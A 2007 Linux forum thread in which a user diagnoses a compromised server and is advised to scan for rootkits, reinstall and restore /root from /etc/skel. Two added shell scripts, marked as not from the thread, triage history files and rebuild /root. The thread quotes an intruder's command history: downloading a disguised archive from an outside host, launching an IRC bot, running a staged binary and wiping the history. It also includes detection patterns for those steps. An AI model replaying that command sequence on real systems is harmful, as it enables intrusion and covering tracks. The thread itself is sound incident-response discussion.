Linux - Security
This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
03-20-2007, 04:33 AM, #1
LQ Newbie
Registered: Nov 2006
Posts: 4
Root user bash shell look like "bash-2.05b#" and /root empty
Hi there
Please help me..anyone
My server was attacked by a scriptkiddie and the little bastard loaded a script which ran from the /tmp dir, I managed to delete everything and the server seems to be fine but...after my last restart I connected using ssh/root and my prompt appeared like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????
What's going on?
Has this box been seriously compromised and I am too stupid to realise?
Any help or suggestions, thanks
PS If this post is in the wrong place, oops sorry

03-20-2007, 06:20 AM, #2
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Quote: Originally Posted by y2pk001
after my last restart I connected using ssh/root and my prompt appeared like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????
But if you login locally (physically login to the system) is the root filesystem there?
In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?

03-20-2007, 09:57 AM, #3
LQ Newbie
Registered: Nov 2006
Posts: 4
Original Poster
Thanks for your response
I am unable to log onto the machine locally, it lives on the otherside of the world from me, I will ask the ISP guys to have a look.
I have run all the tools you spoke of and everything checks out fine
Here is the bash_history
keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history
All I did was delete the user and I found a funny process running in the /tmp dir, I deleted everything in /tmp and killed the process.
What that process was doing was sending email (spam) that looked like it was coming from ebay.com, that stopped.
What else should I do??
Thanks a million

03-20-2007, 08:04 PM, #4
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Quote: All I did was delete the user
So a new user was created on the system?
Quote: and I found a funny process running in the /tmp dir
From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?
Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However that isn't really an option here it seems. The odd bash prompt and missing filesystem is concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.
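As an added example (not from the thread), a small shell triage that scans a recovered .bash_history for the indicators this post points at: an archive disguised as an image, a binary staged into and run from /var/tmp or /tmp, and the history wipe at the end. The function names are mine; the sample history is constructed from the lines in post #3 (the IRC bot's arguments are left out).

```shell
#!/bin/sh
# classify_cmd LINE: print a tag when one history line matches an indicator
# discussed in this thread, print nothing when it looks benign.
# Heuristic only: "./something" also matches harmless local scripts.
classify_cmd() {
    case "$1" in
        *"> .bash_history"*|*"history -c"*)            echo "history-wipe" ;;
        "tar x"*".jpg"|"tar x"*".gif"|"tar x"*".png")  echo "archive-disguised-as-image" ;;
        "cp "*"/tmp/"*|"mv "*"/tmp/"*)                 echo "staged-in-tmp" ;;   # also /var/tmp/
        "/var/tmp/"*|"/tmp/"*|"./"*)                   echo "exec-from-tmp-or-cwd" ;;
        "rm -rf /"*|"rm -Rf /"*)                       echo "destructive-delete" ;;
    esac
}

# triage_history: read history lines on stdin, print "tag<TAB>line" per hit.
# Lines that match nothing are silently dropped.
triage_history() {
    while IFS= read -r line; do
        tag=$(classify_cmd "$line")
        [ -n "$tag" ] && printf '%s\t%s\n' "$tag" "$line"
    done
    return 0
}

# sample_history: constructed from the .bash_history posted in this thread,
# with the bot's command-line arguments removed.
sample_history() {
    cat <<'EOF'
keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history
EOF
}

# Usage: triage the embedded sample (or: triage_history < /home/user/.bash_history)
sample_history | triage_history
```

Running it on the sample flags five of the thirteen lines, including the staging copy into /var/tmp that the post says deserves a look.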

03-22-2007, 03:13 AM, #5
LQ Newbie
Registered: Nov 2006
Posts: 4
Original Poster
The user existed but was created with /bin/bash and a VERY weak password (not by me, by my incompetent colleague), it was for a client who wanted a POP3/imap email.
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happened if I was stupid enough to do that?
A re-install will be a bit difficult, with the current political environment within my office it will almost certainly mean a move to Microsoft Windows which will almost certainly result in my resignation. So I sort of need to try and fix this mess on the hush hush.
Again thanks a lot for your help

03-22-2007, 04:20 AM, #6
Member
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88
If you can be 101+% sure the root isn't compromised and there are no backdoors etc. kiddie stuff on the server I think you can restore your server's normal run, after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.
Last edited by Fadoksi; 03-22-2007 at 04:22 AM.

03-22-2007, 08:33 PM, #7
Senior Member
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658
Quote: Originally Posted by y2pk001
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happened if I was stupid enough to do that?
It would just delete root's home filesystem, in which case you would likely have effects like you're experiencing, like the odd bash prompt because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed and they could have basically done anything including install malicious kernel modules or even replace the kernel itself with a version that happily reports everything is OK and does other nasty things like neglect to show any files owned by the intruder when using system commands like ls. So it is very important to be sure of this.
Quote: Originally Posted by y2pk001
A re-install will be a bit difficult, with the current political environment within my office it will almost certainly mean a move to Microsoft Windows which will almost certainly result in my resignation. So I sort of need to try and fix this mess on the hush hush.
Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.
If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.
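As an added example (not from the thread), a script that does the /etc/skel rebuild this post describes: it copies the skeleton dotfiles into /root, refuses to overwrite anything that survived, and then fixes ownership and permissions. The function name and its arguments are mine; it assumes the distribution ships /etc/skel and that you run it as root for the chown to apply.

```shell
#!/bin/sh
# restore_home_from_skel [SKEL] [DEST] [OWNER]
# Rebuild a wiped home directory (here: /root after "rm -Rf /root") from the
# distribution's skeleton files. Defaults: /etc/skel -> /root, owner root.
# Once .bashrc/.bash_profile are back, the bare "bash-2.05b#" prompt goes away.
restore_home_from_skel() {
    skel="${1:-/etc/skel}"
    dest="${2:-/root}"
    owner="${3:-root}"

    [ -d "$skel" ] || { echo "skeleton dir not found: $skel" >&2; return 1; }
    mkdir -p "$dest"
    chmod 700 "$dest"                 # drwx------ : only the owner may enter

    # Two globs: "*" skips dotfiles, ".[!.]*" catches them without "." and "..".
    for entry in "$skel"/.[!.]* "$skel"/*; do
        [ -e "$entry" ] || continue   # glob matched nothing: skip the literal
        name=$(basename "$entry")
        if [ -e "$dest/$name" ]; then
            echo "keeping existing $dest/$name" >&2   # never clobber survivors
            continue
        fi
        cp -Rp "$entry" "$dest/$name"
    done

    # Only root can chown; when run unprivileged the files keep the caller's uid.
    [ "$(id -u)" -eq 0 ] && chown -R "$owner:$owner" "$dest"

    # root's rc files should not be readable by other accounts on the box.
    for f in "$dest"/.[!.]*; do
        [ -f "$f" ] && chmod 600 "$f"
    done
    return 0
}

# Usage (as root, on the affected box):  restore_home_from_skel
```

Log out and back in afterwards so the restored .bashrc and .bash_profile are read; files that survived are reported on stderr rather than replaced.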